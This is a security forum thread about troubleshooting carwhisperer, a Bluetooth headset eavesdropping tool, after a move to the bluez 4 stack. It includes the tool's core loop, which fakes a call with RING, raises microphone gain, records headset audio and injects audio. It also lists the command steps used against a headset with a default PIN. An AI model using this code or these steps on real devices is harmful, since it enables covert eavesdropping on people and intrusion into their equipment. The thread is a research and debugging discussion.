Could you post the commands you used and their output to include error messages?
Maybe we can either help or get it fixed.
Thanks.
In BT4 because of the new bluetooth stack (bluez 4 instead of bluez 3.x) the tool carwhisperer doesn't work anymore.
It is possible to start it, it will connect to the headset (if default PIN was set correctly), but it doesn't record anything (it fills up the output file with zeros).
Maybe I screwed up something with the settings (however this is highly unlikely), but you know too that bluez 4 has no documentation at all, so figuring out how to change settings is really difficult.
I would highly recommend (if the newer kernel still makes this possible) to return to bluez 3.x.
Thank you,
DOMy
127.0.0.1 sweety 127.0.0.1???
Home, sweety home
-by HK!
Well, it is pretty easy: setting up the default passkey is not possible (hcid.conf is missing), this could be fixed by using some Python script I found on the net. After that, it is able to connect to the BT headset (no more Access denied message), but recording doesn't work, all we got is noise (after SOX postprocessing).
I will look into the source code sometime, but maybe you can find out why this happens.
EDIT2:
Howto Install Carwhisperer on Ubuntu 9.10
This might help, I will test it ASAP, if yes then please include the simple-agent and a short README file in the next Backtrack please.
EDIT3-final:
Well, I checked some stuff, and now I am able to connect to the headset, but all we got as replies are zeros, hcidump shows nicely how all the incoming packets contain only zeros, not valid data.
I tried to send out a test file, and see if it gets played back on the headset, but no luck with that either. It seems that somehow between the stack and the actual hardware some stuff simply disappears or gets cut out or I don't know.
To be short and simple: this part of the carwhisperer code fails with bluez-4 but it does work with bluez-3 (tested):
Code:
    // turn up the speaker volume and the microphone gain to the highest level
    wlen = write(rd, "AT+VGS=15\r\n", 11);
    wlen = write(rd, "AT+VGM=15\r\n", 11);
    // send 'RING' message in order to initiate fake phone call
    wlen = write(rd, "RING\r\n", 6);

    // rd: RFCOMM control channel, sd: SCO audio socket
    maxfd = (rd > sd) ? rd : sd;
    while (!terminate) {
        FD_ZERO(&rfds);
        FD_SET(rd, &rfds);
        FD_SET(sd, &rfds);
        timeout.tv_sec = 2;
        timeout.tv_usec = 0;
        if ((sel = select(maxfd + 1, &rfds, NULL, NULL, &timeout)) > 0) {
            // AT commands from the headset are only handled once SCO audio has started
            if ((FD_ISSET(rd, &rfds)) && (scostarted != 0)) {
                memset(buf, 0, sizeof(buf));
                rlen = read(rd, buf, sizeof(buf));
                //buf[rlen++] = '\0';
                if (rlen > 0) {
                    fprintf(stderr, "got: %s\n", buf);
                    if (strncmp(buf, "AT+BRSF=", 8) == 0) {
                        wlen = write(rd, "+BRSF: 63\r\n", 11);
                        fprintf(stderr, "answered: +BRSF: 63\n");
                    } else if (strncmp(buf, "AT+CIND?", 8) == 0) {
                        wlen = write(rd, "+CIND: 0,1,0,0\r\n", 16);
                        fprintf(stderr, "answered: +CIND: 1\n");
                    } else if (strncmp(buf, "AT+CIND=?", 9) == 0) {
                        wlen = write(rd, "+CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\r\n", 82);
                        fprintf(stderr, "answered: +CIND: (\"call\",(0,1)),(\"service\",(0,1)),(\"call_setup\",(0-3)),(\"callsetup\",(0-3))\n");
                    } else {
                        // answer to anything else with an 'OK'
                        wlen = write(rd, "OK\r\n", 4);
                        fprintf(stderr, "answered: OK\n");
                    }
                } else {
                    // check return value of read call
                    if (rlen == -1) {
                        // terminate loop
                        wlen = write(rd, "AT+VGM=15\r\n", 11);
                        terminate = 1;
                    }
                }
            }
            if (FD_ISSET(sd, &rfds)) {
                scostarted = 1;
                memset(buf, 0, sizeof(buf));
                // incoming SCO audio goes to the output file (fdo) ...
                rlen = read(sd, buf, sizeof(buf));
                if (rlen > 0) {
                    wlen = write(fdo, buf, rlen);
                    // ... and the same amount of the message file (fdi) is played back,
                    // split into SCO MTU sized packets
                    rlen = read(fdi, buf, rlen);
                    wlen = 0;
                    if (rlen > 0) {   // nothing to send on EOF or read error
                        p = buf;
                        while (rlen > sco_mtu) {
                            wlen += write(sd, p, sco_mtu);
                            rlen -= sco_mtu;
                            p += sco_mtu;
                        }
                        wlen += write(sd, p, rlen);
                    }
                }
            }
            if (cnt++ > 800) {
                // keep tuning up the volume for speaker and microphone
                wlen = write(rd, "RING\r\n", 6);
                wlen = write(rd, "AT+VGS=15\r\n", 11);
                wlen = write(rd, "AT+VGM=15\r\n", 11);
                cnt = 0;
                printf(".\n");
            }
        }
    }
    // close sockets
    close(sd);
    close(rd);
    // close files
    close(fdi);
    close(fdo);
    return 0;
    }
Thanks,
DOMy
Last edited by domi007; 10-10-2010 at 08:58 PM.
BUMP, no one does any Bluetooth hacking here? Please, someone?
Don't do that. Ever.
You didn't provide all of what Amael asked for, we see no output to commands. Try complying with a request so that we can help you.
Without any assistance from you, that big chunk of select code is useless to us. I can't say if it's a service= issue or a service issue, or whether or not the software is even associating correctly or just bailing down to saving blanks.
Again, help us to help you.
Still not underestimating the power...
There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
Okay, you are right, here are my steps:
hciconfig hci0 up
hciconfig
(shows my BT dongle is up and running)
hcitool scan
(got my headset's BD address)
/etc/init.d/bluetooth restart
Stopping bluetoothd
Starting bluetoothd
#Following the instructions found on Howto Install Carwhisperer on Ubuntu 9.10
wget http://mediakey.dk/~cc/files/simple-agent
# Kill the existing passkey agent
pkill -9 bluetooth-applet
chmod +x simple-agent
./simple-agent
Agent is running
Opening a new shell tab:
cd /pentest/bluetooth/carwhisperer
./carwhisperer hci0 message.raw out.raw <my headset's bd-address> 2
(message.raw is an empty file, which I made using nano)
Voice setting: 0x0060
RFCOMM channel connected
SCO audio channel connected (handle 45, mtu 64)
The out.raw file contains only zeros. Also note that when carwhisperer sniffs real data it prints a dot and a newline character on the screen like this:
Voice setting: 0x0060
RFCOMM channel connected
SCO audio channel connected (handle 45, mtu 64)
.
.
.
.
Under bt3 and bluez3 it did work perfectly. All I had to do was change some settings in the hcid.conf and restart the hci daemon. The changes I made were: auto authentication (or security mode or whatever it's called), pin 0000, lm mode MASTER, ACCEPT, class 0x050204 (phone).
I am currently trying to change the class and the LM mode with hcitool, so far no success.
mod: Finally changed the class and the lm mode, same result: only zeros in the output file.
Thanks for your help,
appreciate it a lot,
DOMy
I looked into things with hcidump and it seems that the headset is sending only zeroes, I don't know why, maybe it is a low level problem directly related to the BT stack.
Will continue researching the issue, but need some other people too, so please help me
DOMy
Last edited by Archangel-Amael; 10-14-2010 at 07:20 PM.
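An added diagnostic for the symptom described above (an out.raw that holds nothing but zeros), written for this thread and not part of carwhisperer or BackTrack; it assumes the capture is 16-bit little-endian PCM at 8 kHz, which is what the printed voice setting 0x0060 selects on the host side, and uses constructed sample buffers rather than a real capture:

```c
/* Added diagnostic, not part of carwhisperer or BackTrack: classify a raw SCO
 * capture (out.raw) as the all-zero file reported in this thread or as one that
 * carries signal. Assumes 16-bit little-endian PCM at 8 kHz (voice setting 0x0060). */
#include <stdint.h>
#include <stdio.h>

enum capture_state { CAP_EMPTY, CAP_ALL_ZERO, CAP_SIGNAL };
struct capture_stats { size_t samples, zero; int peak; }; /* count, zeros, max |s| */

/* Scan raw little-endian 16-bit PCM, counting zero samples and the peak. */
struct capture_stats analyze_pcm(const uint8_t *buf, size_t len)
{
    struct capture_stats st = {0, 0, 0};
    for (size_t i = 0; i + 1 < len; i += 2) {
        int16_t s = (int16_t)(buf[i] | (buf[i + 1] << 8));
        int a = s < 0 ? -(int)s : (int)s;
        st.samples++;
        if (s == 0) st.zero++;
        if (a > st.peak) st.peak = a;
    }
    return st;
}

/* The symptom in the thread is a file containing nothing but zeros. */
enum capture_state classify_capture(const struct capture_stats *st)
{
    if (st->samples == 0) return CAP_EMPTY;
    if (st->zero == st->samples) return CAP_ALL_ZERO;
    return CAP_SIGNAL;
}
/* Constructed input, not a real capture: 1 kHz square wave at 8 kHz (four
 * samples high, four low), amplitude 8000. Returns the number of bytes. */
size_t make_square_wave(uint8_t *buf, size_t nsamples)
{
    for (size_t i = 0; i < nsamples; i++) {
        int16_t s = (i % 8 < 4) ? 8000 : -8000;
        buf[2 * i] = (uint8_t)(s & 0xff);
        buf[2 * i + 1] = (uint8_t)((s >> 8) & 0xff);
    }
    return nsamples * 2;
}
int main(void)
{
    uint8_t zeros[128] = {0}, tone[128];   /* 64 samples each, constructed */
    struct capture_stats a = analyze_pcm(zeros, sizeof zeros);
    struct capture_stats b = analyze_pcm(tone, make_square_wave(tone, 64));
    printf("zeros: %zu/%zu zero samples, state %d\n", a.zero, a.samples, classify_capture(&a));
    printf("tone: peak %d, state %d\n", b.peak, classify_capture(&b));
    return 0;
}
```

To check a real capture, read out.raw into a buffer and pass it to analyze_pcm; a CAP_ALL_ZERO result reproduces the bluez-4 symptom, while a small non-zero peak points at noise rather than a dead channel.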
Nobody?
I guess then I will have to make my own distribution for hacking...well whatever!